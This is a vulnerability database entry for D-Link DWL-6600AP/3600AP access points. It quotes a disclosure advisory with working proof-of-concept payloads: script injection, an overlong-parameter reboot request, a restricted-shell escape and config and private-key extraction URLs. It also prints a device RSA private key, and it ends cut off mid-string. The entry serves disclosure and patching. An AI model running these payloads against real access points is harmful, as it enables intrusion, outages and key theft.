VAR-201908-0911
Vulnerability from variot - Updated: 2024-11-23 21:52An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot. # Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=alert(document.cookie)
Example 2: http://10.90.90.91/admin.cgi?action=+guestalert('Pwned')
2. Post-authenticated Certificate and RSA Private Key extraction
through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW 2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N 29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS 7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME 9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5 beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE 45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ== -----END CERTIFICATE-----
3. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0911",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dwl-3600ap",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14333",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14333",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CNVD-2019-29140",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "VHN-146269",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14333",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2019-14333",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14333",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14333",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-29140",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1639",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146269",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29140"
},
{
"db": "VULHUB",
"id": "VHN-146269"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007261"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1639"
},
{
"db": "NVD",
"id": "CVE-2019-14333"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee\nHk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o\nBioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B\nvsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t\n7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c\nunyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk\n1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6\nJ8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14\nyRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z\n0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc\nfmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB\ni5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb\ndAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ\nOztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ\nVuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9\nJ3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr\nH975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw\nuF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy\nyGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd\npagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co\npaZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8\n1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm\nfPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS\nokObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px\nbgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY\n-----END RSA PRIVATE KEY-----\n-----BEGIN CERTIFICATE-----\nMIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx\nMC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp\nbmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL\nMAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU\nMBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG\nA1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE\nCBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu\nOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB\nBQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp\nwRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC\nI+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW\n2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK\nYwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N\n29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B\nAQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS\n7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME\n9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5\nbeF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE\n45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef\nMjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==\n-----END CERTIFICATE-----\n\n### 3. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is 